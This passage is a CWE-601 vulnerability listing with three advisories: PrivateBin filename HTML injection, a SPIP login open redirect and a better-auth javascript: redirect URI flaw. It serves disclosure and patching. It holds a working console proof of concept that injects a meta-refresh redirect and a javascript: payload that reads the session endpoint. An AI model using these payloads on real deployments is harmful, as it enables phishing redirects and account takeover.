CWE-601
AllowedURL Redirection to Untrusted Site ('Open Redirect')
Abstraction: Base · Status: Draft
The web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a redirect.
2305 vulnerabilities reference this CWE, most recent first.
GHSA-867C-P784-5Q6G
Vulnerability from github – Published: 2025-10-28 20:14 – Updated: 2025-10-29 14:48We’ve identified an HTML injection/XSS vulnerability in PrivateBin service that allows the injection of arbitrary HTML markup via the attached filename. Below are the technical details, PoC, reproduction steps, impact, and mitigation recommendations.
Recommend action: As the vulnerability has been fixed in the latest version, users are strongly encouraged to upgrade PrivateBin to the latest version and check that a strong CSP header, just as the default suggested one, is delivered.
Summary of the vulnerability: The attachment_name field containing the attached file name is included in the object that the client encrypts and is eventually rendered in the DOM without proper escaping.
Impact
The vulnerability allows attackers to inject arbitrary HTML into the filename displayed near the file size hint, when attachments are enabled. This is by definition a XSS vulnerability (CWE-80), in this case even a persistent XSS. As any HTML can be injected, basically, this can e.g. be used to inject a script tag (as per CWE-79).
That said, also due to previous issues, we have strong mitigations for this in place. The content security policy (CSP) does, if configured as recommend by the PrivateBin project, prevent any inline script execution, so the confidentiality of the paste is not affected.
However, as the reporter demonstrated, even when script execution is blocked, an HTML injection can still be used for attacks such as: * redirection using a meta redirect tag to redirect to a potentially malicious/attacker-controlled website * defacement of the website * phishing, in combination with the redirection to a clone of a PrivateBin phishing page or similar * potential attacks on other services hosted on the same domain
This list is by no means meant to be exhaustive, other attacks should be considered possible, that is why we treat this issue as a serious issue, even if the CSP is supposed to block the most attacks.
[!IMPORTANT]
Depending on the deployment, if the server has a different than the recommend CSP configured or the client (browser) somehow lacks a protection, the vulnerability can have much more serious impacts and potentially also allow XSS, which could mean the confidentiality of the PrivateBin instance is affected.
Technical Description
The front-end uses PrivateBin (client-side encryption) to format and encrypt data before sending. During the paste creation process, the client assembles a cipherMessage object containing, among other fields:
* paste -> paste text
* attachment -> file content (data-URI)
* attachment_name -> array with file names
Before encryption, the ServerInteraction.setCipherMessage(cipherMessage) function is called. By intercepting/altering the cipherMessage on the client immediately before encryption, it is possible to replace attachment_name with an attacker-controlled string; this string becomes part of the encrypted content, and when the paste is opened, the local client decrypts and inserts the name into the DOM unescaped, allowing the interpretation of inserted HTML markup.
Note that it was not necessary to reimplement encryption: the monkeypatch modifies the object before the client applies AES-GCM/PBKDF2/compression, thus avoiding ciphertext formatting issues.
Proof of concept
Paste this into the console on the PrivateBin page before clicking Create.
// Monkeypatch to modify attachment_name immediately before encryption
(() => {
const desiredName = '"><meta http-equiv="refresh" content="0;url=https://example.com/">.txt'; // <- adjust here
// get the namespace used by PrivateBin
if (!window.$ || !$.PrivateBin || !$.PrivateBin.ServerInteraction) {
return console.error('PrivateBin namespace not found (make sure you are on the PrivateBin page).');
}
const SI = $.PrivateBin.ServerInteraction;
// save original function
const origSetCipherMessage = SI.setCipherMessage?.bind(SI);
if (typeof origSetCipherMessage !== 'function') {
return console.error('setCipherMessage not found or is not a function.');
}
SI.setCipherMessage = async function(cipherMessage) {
try {
// cipherMessage here is the plain object the client intends to encrypt
if (cipherMessage && Array.isArray(cipherMessage.attachment_name)) {
console.log('[patch] original attachment_name:', cipherMessage.attachment_name);
cipherMessage.attachment_name = cipherMessage.attachment_name.map(() => desiredName);
console.log('[patch] attachment_name overwritten to:', cipherMessage.attachment_name);
} else if (cipherMessage && cipherMessage.attachment && Array.isArray(cipherMessage.attachment)) {
// if there are attachments but no attachment_name (rare), add a coherent array
cipherMessage.attachment_name = cipherMessage.attachment.map(() => desiredName);
console.log('[patch] attachment_name added:', cipherMessage.attachment_name);
} else {
// nothing to change
}
// call the original implementation (which performs the encryption)
return await origSetCipherMessage(cipherMessage);
} catch (err) {
console.error('Error in setCipherMessage monkeypatch:', err);
// in case of error, attempt to call the original anyway
return await origSetCipherMessage(cipherMessage);
}
};
console.log('Monkeypatch applied to ServerInteraction.setCipherMessage() - ready to send. (Reload the page to undo).');
})();
Reproduction Steps
- Access PrivateBin (in the program scope). A requirement is that you have file upload enabled.
- Attach any file via the UI (file content irrelevant).
- Open the browser console (F12 → Console).
- Paste the snippet above and adjust
desiredNameto the desired HTML payload (e.g.,"><meta http-equiv="refresh" content="0;url=https://example.com/">.txt). - Click Create. The client will encrypt and send the paste normally.
- Intercept/inspect the POST request (optional).
- Open the generated link.
What happens: When rendering the paste, the content of the injected attachment_name will be interpreted according to the context, demonstrating the impact.
Mitigation
We strongly recommend you to upgrade to our latest release. However, here are some workarounds that may help you to mitigate this vulnerability without upgrade:
- Update the CSP in your configuration file to the latest recommended settings and check that it isn't getting reverted or overwritten by your web server, reverse proxy or CDN, i.e. using our offered check service. Note: You should check your CSP independently, even if you upgrade to a fixed version. See also the section "More information" about how we recently enhanced the CSP protection.
- Deploying PrivateBin on a separate domain may limit the scope of the vulnerability to PrivateBin itself and thus, as described in the “Impact” section, effectively prevent any damage by the vulnerability to other resources you are hosting.
- As explained in the impact assessment, disabling attachments also prevents this issue.
Patches
The issue has been patched in version 2.0.2. The change that displayed the attachment name without sanitation was introduced in version 1.7.7. The code-changes in PrivateBin mitigating this issue can be found in commit c4f8482b3072be7ae012cace1b3f5658dcc3b42e.
References
We highly encourage server administrators and others involved with the PrivateBin project to read-up on how Content-Security-Policies work, especially should you consider to manually adjust it: * https://content-security-policy.com/ * https://developer.mozilla.org/docs/Web/HTTP/CSP * https://developers.google.com/web/fundamentals/security/csp/
Also please note that if multiple headers are set (as e.g. done via our introduced meta tag) browsers should apply the most restrictive set of the policies, as per the CSP specification.
More information
This issue is similar to https://github.com/PrivateBin/PrivateBin/security/advisories/GHSA-cqcc-mm6x-vmvw, but was, based on our analysis, apparently introduced in https://github.com/PrivateBin/PrivateBin/pull/1550.
Note that we have, independently as of this issue and as per regular security maintenance, already applied many CSP improvements and strengthened this security mechanism of PrivateBin. This includes in detail:
* As part of the last XSS vulnerability, we have now included the CSP in a meta HTML tag, too, so in case the headers are somehow mangled with by (reverse) proxies or similar, the PrivateBin instance should still be protected as long as this HTML meta tag is included in an unchanged way.
* https://github.com/PrivateBin/PrivateBin/pull/1613 - We have removed a outdated configuration recommendation, as default-src does not need to allow self anymore, but it can keep the more strict none even when using the bootstrap SVG icons. (previously a problem in Firefox prevented this)
* https://github.com/PrivateBin/PrivateBin/pull/1464 - We could remove the previously used unsafe-eval that was a potentially risky CSP source being allowed for scripts, and replaced it with wasm-unsafe-eval for the streaming of a WebAssembly component used for optional compression. This can be disabled in the configuration and then wasm-unsafe-eval can also be removed.
In case you have not noticed this and did not upgrade your CSP header yet, we strongly recommend to do it as soon as possible!
Credits
On Thursday October 23rd, 2025 we received a report via email at security@privatebin.org. The reporter asked to stay anonymous. We thank them a lot for the detailed reporting of this vulnerability, including the description of the proof of concept listed above!
In general, we'd like to thank everyone reporting issues and potential vulnerabilities to us.
If you think you have found a vulnerability or potential security risk, we'd kindly ask you to follow our security policy and report it to us. We then assess the report and will take the actions we deem necessary to address it.
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "privatebin/privatebin"
},
"ranges": [
{
"events": [
{
"introduced": "1.7.7"
},
{
"fixed": "2.0.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-62796"
],
"database_specific": {
"cwe_ids": [
"CWE-601",
"CWE-79"
],
"github_reviewed": true,
"github_reviewed_at": "2025-10-28T20:14:09Z",
"nvd_published_at": "2025-10-28T21:15:40Z",
"severity": "MODERATE"
},
"details": "We\u2019ve identified an HTML injection/XSS vulnerability in PrivateBin service that allows the injection of arbitrary HTML markup via the attached filename. Below are the technical details, PoC, reproduction steps, impact, and mitigation recommendations.\n\n**Recommend action:** As the vulnerability has been fixed in the latest version, users are **strongly encouraged** to upgrade PrivateBin to the latest version _and_ [check](https://privatebin.info/directory/check) that a strong CSP header, just as the default suggested one, is delivered.\n\n**Summary of the vulnerability:** The `attachment_name` field containing the attached file name is included in the object that the client encrypts and is eventually rendered in the DOM without proper escaping.\n\n## Impact\nThe vulnerability allows attackers to inject arbitrary HTML into the filename displayed near the file size hint, when attachments are enabled. This is by definition [a XSS vulnerability (CWE-80)](https://cwe.mitre.org/data/definitions/80.html), in this case even a persistent XSS. As any HTML can be injected, basically, this can e.g. be used to inject [a script tag (as per CWE-79)](https://cwe.mitre.org/data/definitions/79.html).\n\nThat said, also due to [previous issues](#more-informaton), we have strong mitigations for this in place. The [content security policy (CSP)](https://content-security-policy.com/) does, if configured as recommend by the PrivateBin project, prevent any inline script execution, so the confidentiality of the paste is _not_ affected.\n\nHowever, as the reporter demonstrated, even when script execution is blocked, an HTML injection can still be used for attacks such as:\n* redirection using a meta redirect tag to redirect to a potentially malicious/attacker-controlled website\n* defacement of the website\n* phishing, in combination with the redirection to a clone of a PrivateBin phishing page or similar\n* potential attacks on other services hosted on the same domain\n\nThis list is by no means meant to be exhaustive, other attacks should be considered possible, that is why we treat this issue as a serious issue, even if the CSP is supposed to block the most attacks.\n\n\u003e [!IMPORTANT] \n\u003e Depending on the deployment, if the server has a different than the recommend CSP configured or the client (browser) somehow lacks a protection, the vulnerability can have much more serious impacts and potentially also allow XSS, which could mean the confidentiality of the PrivateBin instance is affected. \n\n## Technical Description\n\nThe front-end uses PrivateBin (client-side encryption) to format and encrypt data before sending. During the paste creation process, the client assembles a `cipherMessage` object containing, among other fields:\n* `paste` -\u003e paste text\n* `attachment` -\u003e file content (data-URI)\n* `attachment_name` -\u003e array with file names\n\nBefore encryption, the `ServerInteraction.setCipherMessage(cipherMessage)` function is called. By intercepting/altering the `cipherMessage` on the client immediately before encryption, it is possible to replace `attachment_name` with an attacker-controlled string; this string becomes part of the encrypted content, and when the paste is opened, the local client decrypts and inserts the name into the DOM unescaped, allowing the interpretation of inserted HTML markup.\n\nNote that it was not necessary to reimplement encryption: the monkeypatch modifies the object before the client applies AES-GCM/PBKDF2/compression, thus avoiding ciphertext formatting issues.\n\n## Proof of concept\nPaste this into the console on the PrivateBin page before clicking Create.\n\n```js\n// Monkeypatch to modify attachment_name immediately before encryption\n(() =\u003e {\n const desiredName = \u0027\"\u003e\u003cmeta http-equiv=\"refresh\" content=\"0;url=https://example.com/\"\u003e.txt\u0027; // \u003c- adjust here\n\n // get the namespace used by PrivateBin\n if (!window.$ || !$.PrivateBin || !$.PrivateBin.ServerInteraction) {\n return console.error(\u0027PrivateBin namespace not found (make sure you are on the PrivateBin page).\u0027);\n }\n\n const SI = $.PrivateBin.ServerInteraction;\n // save original function\n const origSetCipherMessage = SI.setCipherMessage?.bind(SI);\n\n if (typeof origSetCipherMessage !== \u0027function\u0027) {\n return console.error(\u0027setCipherMessage not found or is not a function.\u0027);\n }\n\n SI.setCipherMessage = async function(cipherMessage) {\n try {\n // cipherMessage here is the plain object the client intends to encrypt\n if (cipherMessage \u0026\u0026 Array.isArray(cipherMessage.attachment_name)) {\n console.log(\u0027[patch] original attachment_name:\u0027, cipherMessage.attachment_name);\n cipherMessage.attachment_name = cipherMessage.attachment_name.map(() =\u003e desiredName);\n console.log(\u0027[patch] attachment_name overwritten to:\u0027, cipherMessage.attachment_name);\n } else if (cipherMessage \u0026\u0026 cipherMessage.attachment \u0026\u0026 Array.isArray(cipherMessage.attachment)) {\n // if there are attachments but no attachment_name (rare), add a coherent array\n cipherMessage.attachment_name = cipherMessage.attachment.map(() =\u003e desiredName);\n console.log(\u0027[patch] attachment_name added:\u0027, cipherMessage.attachment_name);\n } else {\n // nothing to change\n }\n\n // call the original implementation (which performs the encryption)\n return await origSetCipherMessage(cipherMessage);\n } catch (err) {\n console.error(\u0027Error in setCipherMessage monkeypatch:\u0027, err);\n // in case of error, attempt to call the original anyway\n return await origSetCipherMessage(cipherMessage);\n }\n };\n\n console.log(\u0027Monkeypatch applied to ServerInteraction.setCipherMessage() - ready to send. (Reload the page to undo).\u0027);\n})();\n```\n\n## Reproduction Steps\n\n1. Access PrivateBin (in the program scope). A requirement is that you have file upload enabled.\n2. Attach any file via the UI (file content irrelevant).\n3. Open the browser console (F12 \u2192 Console).\n4. Paste the snippet above and adjust `desiredName` to the desired HTML payload (e.g.,` \"\u003e\u003cmeta http-equiv=\"refresh\" content=\"0;url=https://example.com/\"\u003e.txt`).\n5. Click Create. The client will encrypt and send the paste normally.\n6. Intercept/inspect the POST request (optional).\n7. Open the generated link.\n\n**What happens:** When rendering the paste, the content of the injected attachment_name will be interpreted according to the context, demonstrating the impact.\n\n## Mitigation\n\nWe strongly recommend you to **upgrade to our latest release**. However, here are some workarounds that may help you to mitigate this vulnerability without upgrade:\n\n* Update the [CSP in your configuration file](https://github.com/PrivateBin/PrivateBin/wiki/Configuration#cspheader) to the latest recommended settings and check that it isn\u0027t getting reverted or overwritten by your web server, reverse proxy or CDN, i.e. using [our offered check service](https://privatebin.info/directory/check).\n **Note:** You should check your CSP independently, even if you upgrade to a fixed version. See also the section [\"More information\"](#more-information) about how we recently enhanced the CSP protection. \n* Deploying PrivateBin on a separate domain may limit the scope of the vulnerability to PrivateBin itself and thus, as described in the \u201cImpact\u201d section, effectively prevent any damage by the vulnerability to other resources you are hosting.\n* As explained in the impact assessment, disabling attachments also prevents this issue.\n\n## Patches\n\nThe issue has been patched in version 2.0.2. The change that displayed the attachment name without sanitation was introduced in version 1.7.7. The code-changes in PrivateBin mitigating this issue can be found in commit c4f8482b3072be7ae012cace1b3f5658dcc3b42e.\n\n## References\nWe highly encourage server administrators and others involved with the PrivateBin project to read-up on how Content-Security-Policies work, especially should you consider to manually adjust it:\n* https://content-security-policy.com/\n* https://developer.mozilla.org/docs/Web/HTTP/CSP\n* https://developers.google.com/web/fundamentals/security/csp/\n\nAlso please note that if multiple headers are set (as e.g. done via our introduced meta tag) [browsers should apply the most restrictive set of the policies](https://stackoverflow.com/a/51153816/5008962), [as per the CSP specification](https://www.w3.org/TR/CSP2/#enforcing-multiple-policies).\n\n## More information\nThis issue is similar to https://github.com/PrivateBin/PrivateBin/security/advisories/GHSA-cqcc-mm6x-vmvw, but was, based on our analysis, apparently introduced in https://github.com/PrivateBin/PrivateBin/pull/1550.\n\nNote that we have, independently as of this issue and as per regular security maintenance, already applied many CSP improvements and strengthened this security mechanism of PrivateBin. This includes in detail:\n* As part of the [last XSS vulnerability](#more-information), we have now included the CSP in a meta HTML tag, too, so in case the headers are somehow mangled with by (reverse) proxies or similar, the PrivateBin instance should still be protected as long as this HTML meta tag is included in an unchanged way.\n* https://github.com/PrivateBin/PrivateBin/pull/1613 - We have removed a outdated configuration recommendation, as `default-src` does not need to allow `self` anymore, but it can keep the more strict `none` even when using the bootstrap SVG icons. ([previously a problem in Firefox prevented this](https://bugzilla.mozilla.org/show_bug.cgi?id=1773976))\n* https://github.com/PrivateBin/PrivateBin/pull/1464 - We could remove the previously used `unsafe-eval` that was a potentially risky CSP source being allowed for scripts, and replaced it with `wasm-unsafe-eval` for the streaming of a WebAssembly component used for optional compression. This can be disabled in the configuration and then `wasm-unsafe-eval` can also be removed.\n\nIn case you have not noticed this and did not upgrade your CSP header yet, **we strongly recommend to do it as soon as possible**!\n\n## Credits\n\nOn Thursday October 23rd, 2025 we received a report via email at security@privatebin.org. The reporter asked to stay anonymous. We thank them a lot for the detailed reporting of this vulnerability, including the description of the proof of concept listed above!\n\nIn general, we\u0027d like to thank everyone reporting issues and potential vulnerabilities to us.\n\nIf you think you have found a vulnerability or potential security risk, [we\u0027d kindly ask you to follow our security policy](https://github.com/PrivateBin/PrivateBin/blob/master/SECURITY.md) and report it to us. We then assess the report and will take the actions we deem necessary to address it.",
"id": "GHSA-867c-p784-5q6g",
"modified": "2025-10-29T14:48:58Z",
"published": "2025-10-28T20:14:09Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/PrivateBin/PrivateBin/security/advisories/GHSA-867c-p784-5q6g"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-62796"
},
{
"type": "WEB",
"url": "https://github.com/PrivateBin/PrivateBin/pull/1550"
},
{
"type": "WEB",
"url": "https://github.com/PrivateBin/PrivateBin/commit/c4f8482b3072be7ae012cace1b3f5658dcc3b42e"
},
{
"type": "PACKAGE",
"url": "https://github.com/PrivateBin/PrivateBin"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "PrivateBin is missing HTML sanitization of attached filename in file size hint"
}
GHSA-86CF-7CVR-X43R
Vulnerability from github – Published: 2026-02-19 18:31 – Updated: 2026-02-19 18:31SPIP before 4.4.5 and 4.3.9 allows an Open Redirect via the login form when used in AJAX mode. An attacker can craft a malicious URL that, when visited by a victim, redirects them to an arbitrary external site after login. This vulnerability only affects sites where the login page has been overridden to function in AJAX mode. It is not mitigated by the SPIP security screen.
{
"affected": [],
"aliases": [
"CVE-2025-71244"
],
"database_specific": {
"cwe_ids": [
"CWE-601"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-02-19T16:27:12Z",
"severity": "MODERATE"
},
"details": "SPIP before 4.4.5 and 4.3.9 allows an Open Redirect via the login form when used in AJAX mode. An attacker can craft a malicious URL that, when visited by a victim, redirects them to an arbitrary external site after login. This vulnerability only affects sites where the login page has been overridden to function in AJAX mode. It is not mitigated by the SPIP security screen.",
"id": "GHSA-86cf-7cvr-x43r",
"modified": "2026-02-19T18:31:54Z",
"published": "2026-02-19T18:31:54Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71244"
},
{
"type": "WEB",
"url": "https://blog.spip.net/Mise-a-jour-de-securite-sortie-de-SPIP-4-4-5.html"
},
{
"type": "WEB",
"url": "https://git.spip.net/spip/spip"
},
{
"type": "WEB",
"url": "https://www.vulncheck.com/advisories/spip-open-redirect-via-login-form"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-86J7-9J95-VPQJ
Vulnerability from github – Published: 2026-07-07 20:55 – Updated: 2026-07-07 20:55Am I affected?
Check each condition. Users are affected when all of the first three hold.
- Their application enables the
oidc-providerplugin or themcpplugin frombetter-auth/plugins. Themcpplugin wraps the same provider and carries the same defect. Both are on the migration path to@better-auth/oauth-provider, which is not affected. - Their application
better-authversion is1.6.12or earlier on the stable line, or any1.7.0-betabuild on the pre-release line. Both release lines carry the same defect. - Their application consent page is a client component that reads
redirectURIfrom theauthClient.oauth2.consent(...)response and assigns it to a browser navigation target such aswindow.location.href,location.assign, orlocation.replace.
Two conditions raise an application's exposure:
- It sets
allowDynamicClientRegistration: true. Client registration is then unauthenticated, so any visitor can plant the malicious client. The default isfalse, which limits planting to authenticated users. - It exposes the consent page to ordinary end users rather than to a restricted operator audience.
A developer's application is not affected when any of these hold:
- Their application copied the project's
consent-buttons.tsxdemo verbatim. That file reads aurifield that this plugin never returns, so its navigation branch never runs and it falls through to an error toast. - Their application completse the consent flow with a server-side redirect, for example a Next.js or Remix server action. Browsers do not follow a
javascript:URL delivered in aLocationresponse header. - Their application uses
@better-auth/oauth-providerinstead of the deprecatedoidc-providerplugin.
Fix:
- Upgrade to
better-auth@1.6.13(stable) or1.7.0-beta.4(pre-release). - If developers cannot upgrade their applications, see the workarounds below.
Summary
The deprecated oidc-provider plugin registers OAuth clients without validating the scheme of their redirect_uris. An attacker stores a javascript: URI as a client redirect target, and the authorization server later returns that URI to the browser in the consent response. A consent page that navigates to the returned value then executes attacker JavaScript in the authorization-server origin, which exposes the victim's session and enables account takeover. The mcp plugin wraps the same provider and carries the same defect, so MCP server deployments are affected as well; like oidc-provider, it is migrating to @better-auth/oauth-provider.
Details
Client registration accepts any string. The registration body schema types redirect_uris as z.array(z.string()) with no scheme check, so POST /oauth2/register stores a value such as javascript:fetch('/api/auth/get-session')//. In the default configuration, allowDynamicClientRegistration is false, so registration requires an authenticated session; any logged-in user qualifies. With dynamic client registration enabled, registration is unauthenticated.
The dangerous value then survives the authorization-code flow unchanged. GET /oauth2/authorize matches the request redirect_uri against the stored list by exact string equality, so the registered javascript: URI matches itself and is written into the consent verification record. When the user approves on the consent screen, the handler runs new URL(value.redirectURI), appends the authorization code through searchParams.set, and returns the result in JSON under the key redirectURI. The javascript: scheme passes through new URL intact, and a trailing // in the payload comments out the appended query string.
The plugin documents the consent call but not the redirect step that follows it, and it gives no warning that redirectURI can carry a dangerous scheme. The natural way an operator completes the flow is to assign res.data.redirectURI to window.location.href. Per the URL specification and browser behavior, navigating window.location to a javascript: URL executes the script body in the current document origin, which here is the authorization server. The injected script can call /api/auth/get-session and any other session-scoped endpoint in that origin.
The sibling @better-auth/oauth-provider package already prevents this. It validates the same field with SafeUrlSchema, which rejects the javascript:, data:, and vbscript: schemes and requires HTTPS or a loopback host. The deprecated plugin never received that control; the field shipped unvalidated when the registration endpoint was first added, well before the sibling package introduced SafeUrlSchema.
Patches
Fixed in better-auth@1.6.13 (stable) and 1.7.0-beta.4 (pre-release). The fix adds scheme validation to the redirect_uris of both the oidc-provider and mcp plugins, matching the control @better-auth/oauth-provider already enforces.
Workarounds
If developers cannot upgrade, apply one of the following.
- Harden the consent page. Before navigating, parse the returned value and navigate only when its scheme is
http:orhttps:. For example, reject the value whennew URL(redirectURI).protocolis neitherhttp:norhttps:, and show an error instead of navigating. This closes the sink regardless of what the server returns. - Migrate to
@better-auth/oauth-provider. It validates redirect URIs at registration and is the supported replacement for the deprecated plugin. - Keep
allowDynamicClientRegistrationat its default offalseand restrict who can register clients. This does not remove the issue, because any authenticated user can still register a malicious client, but it removes the unauthenticated path.
Impact
This is a stored DOM cross-site scripting issue in the authorization server's own origin, which leads to account takeover. An attacker who can register a client plants a javascript: redirect URI. A victim who visits the attacker's authorize URL and approves consent runs attacker JavaScript in the authorization-server origin. From there the script reads /api/auth/get-session, calls any session-scoped endpoint, and takes over the account. The consent screen shows the attacker-controlled client name, which makes the approval click easy to socially engineer.
The realized impact depends on one operator-side precondition: the consent page must assign the returned redirectURI to a navigation target. Better Auth itself never performs that navigation, which is why the assessed Attack Complexity is High and the score sits below a pure server-side execution flaw. The deprecated status of the oidc-provider plugin does not reduce the impact. The plugin remains published, importable, and documented, and users on the affected versions cannot opt out without changing their integration. The mcp plugin wraps the same provider and is affected on the same versions; its docs announce a move to @better-auth/oauth-provider, but until users migrate or upgrade, the affected published versions stay exposed. @better-auth/oauth-provider validates redirect URIs and provides MCP support, so it is the migration target for both plugins.
Credit
Reported by @hillalee
Resources
- CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'). https://cwe.mitre.org/data/definitions/79.html
- CWE-601: URL Redirection to Untrusted Site ('Open Redirect'). https://cwe.mitre.org/data/definitions/601.html
- RFC 6749 (OAuth 2.0) Section 3.1.2, Redirection Endpoint: the redirection endpoint URI must be an absolute URI. https://datatracker.ietf.org/doc/html/rfc6749#section-3.1.2
- MDN, javascript: URLs: navigating
window.locationto ajavascript:URL executes the script body. https://developer.mozilla.org/en-US/docs/Web/URI/Reference/Schemes/javascript
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "better-auth"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.6.13"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "better-auth"
},
"ranges": [
{
"events": [
{
"introduced": "1.7.0-beta.0"
},
{
"fixed": "1.7.0-beta.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-601",
"CWE-79"
],
"github_reviewed": true,
"github_reviewed_at": "2026-07-07T20:55:28Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Am I affected?\n\nCheck each condition. Users are affected when all of the first three hold.\n\n- Their application enables the `oidc-provider` plugin or the `mcp` plugin from `better-auth/plugins`. The `mcp` plugin wraps the same provider and carries the same defect. Both are on the migration path to `@better-auth/oauth-provider`, which is not affected.\n- Their application `better-auth` version is `1.6.12` or earlier on the stable line, or any `1.7.0-beta` build on the pre-release line. Both release lines carry the same defect.\n- Their application consent page is a client component that reads `redirectURI` from the `authClient.oauth2.consent(...)` response and assigns it to a browser navigation target such as `window.location.href`, `location.assign`, or `location.replace`.\n\nTwo conditions raise an application\u0027s exposure:\n\n- It sets `allowDynamicClientRegistration: true`. Client registration is then unauthenticated, so any visitor can plant the malicious client. The default is `false`, which limits planting to authenticated users.\n- It exposes the consent page to ordinary end users rather than to a restricted operator audience.\n\nA developer\u0027s application is not affected when any of these hold:\n\n- Their application copied the project\u0027s `consent-buttons.tsx` demo verbatim. That file reads a `uri` field that this plugin never returns, so its navigation branch never runs and it falls through to an error toast.\n- Their application completse the consent flow with a server-side redirect, for example a Next.js or Remix server action. Browsers do not follow a `javascript:` URL delivered in a `Location` response header.\n- Their application uses `@better-auth/oauth-provider` instead of the deprecated `oidc-provider` plugin.\n\nFix:\n\n1. Upgrade to `better-auth@1.6.13` (stable) or `1.7.0-beta.4` (pre-release).\n2. If developers cannot upgrade their applications, see the workarounds below.\n\n### Summary\n\nThe deprecated `oidc-provider` plugin registers OAuth clients without validating the scheme of their `redirect_uris`. An attacker stores a `javascript:` URI as a client redirect target, and the authorization server later returns that URI to the browser in the consent response. A consent page that navigates to the returned value then executes attacker JavaScript in the authorization-server origin, which exposes the victim\u0027s session and enables account takeover. The `mcp` plugin wraps the same provider and carries the same defect, so MCP server deployments are affected as well; like `oidc-provider`, it is migrating to `@better-auth/oauth-provider`.\n\n### Details\n\nClient registration accepts any string. The registration body schema types `redirect_uris` as `z.array(z.string())` with no scheme check, so `POST /oauth2/register` stores a value such as `javascript:fetch(\u0027/api/auth/get-session\u0027)//`. In the default configuration, `allowDynamicClientRegistration` is `false`, so registration requires an authenticated session; any logged-in user qualifies. With dynamic client registration enabled, registration is unauthenticated.\n\nThe dangerous value then survives the authorization-code flow unchanged. `GET /oauth2/authorize` matches the request `redirect_uri` against the stored list by exact string equality, so the registered `javascript:` URI matches itself and is written into the consent verification record. When the user approves on the consent screen, the handler runs `new URL(value.redirectURI)`, appends the authorization code through `searchParams.set`, and returns the result in JSON under the key `redirectURI`. The `javascript:` scheme passes through `new URL` intact, and a trailing `//` in the payload comments out the appended query string.\n\nThe plugin documents the consent call but not the redirect step that follows it, and it gives no warning that `redirectURI` can carry a dangerous scheme. The natural way an operator completes the flow is to assign `res.data.redirectURI` to `window.location.href`. Per the URL specification and browser behavior, navigating `window.location` to a `javascript:` URL executes the script body in the current document origin, which here is the authorization server. The injected script can call `/api/auth/get-session` and any other session-scoped endpoint in that origin.\n\nThe sibling `@better-auth/oauth-provider` package already prevents this. It validates the same field with `SafeUrlSchema`, which rejects the `javascript:`, `data:`, and `vbscript:` schemes and requires HTTPS or a loopback host. The deprecated plugin never received that control; the field shipped unvalidated when the registration endpoint was first added, well before the sibling package introduced `SafeUrlSchema`.\n\n### Patches\n\nFixed in `better-auth@1.6.13` (stable) and `1.7.0-beta.4` (pre-release). The fix adds scheme validation to the `redirect_uris` of both the `oidc-provider` and `mcp` plugins, matching the control `@better-auth/oauth-provider` already enforces.\n\n### Workarounds\n\nIf developers cannot upgrade, apply one of the following.\n\n- Harden the consent page. Before navigating, parse the returned value and navigate only when its scheme is `http:` or `https:`. For example, reject the value when `new URL(redirectURI).protocol` is neither `http:` nor `https:`, and show an error instead of navigating. This closes the sink regardless of what the server returns.\n- Migrate to `@better-auth/oauth-provider`. It validates redirect URIs at registration and is the supported replacement for the deprecated plugin.\n- Keep `allowDynamicClientRegistration` at its default of `false` and restrict who can register clients. This does not remove the issue, because any authenticated user can still register a malicious client, but it removes the unauthenticated path.\n\n### Impact\n\nThis is a stored DOM cross-site scripting issue in the authorization server\u0027s own origin, which leads to account takeover. An attacker who can register a client plants a `javascript:` redirect URI. A victim who visits the attacker\u0027s authorize URL and approves consent runs attacker JavaScript in the authorization-server origin. From there the script reads `/api/auth/get-session`, calls any session-scoped endpoint, and takes over the account. The consent screen shows the attacker-controlled client name, which makes the approval click easy to socially engineer.\n\nThe realized impact depends on one operator-side precondition: the consent page must assign the returned `redirectURI` to a navigation target. Better Auth itself never performs that navigation, which is why the assessed Attack Complexity is High and the score sits below a pure server-side execution flaw. The deprecated status of the `oidc-provider` plugin does not reduce the impact. The plugin remains published, importable, and documented, and users on the affected versions cannot opt out without changing their integration. The `mcp` plugin wraps the same provider and is affected on the same versions; its docs announce a move to `@better-auth/oauth-provider`, but until users migrate or upgrade, the affected published versions stay exposed. `@better-auth/oauth-provider` validates redirect URIs and provides MCP support, so it is the migration target for both plugins.\n\n### Credit\n\nReported by @hillalee \n\n### Resources\n\n- CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027). https://cwe.mitre.org/data/definitions/79.html\n- CWE-601: URL Redirection to Untrusted Site (\u0027Open Redirect\u0027). https://cwe.mitre.org/data/definitions/601.html\n- RFC 6749 (OAuth 2.0) Section 3.1.2, Redirection Endpoint: the redirection endpoint URI must be an absolute URI. https://datatracker.ietf.org/doc/html/rfc6749#section-3.1.2\n- MDN, javascript: URLs: navigating `window.location` to a `javascript:` URL executes the script body. https://developer.mozilla.org/en-US/docs/Web/URI/Reference/Schemes/javascript",
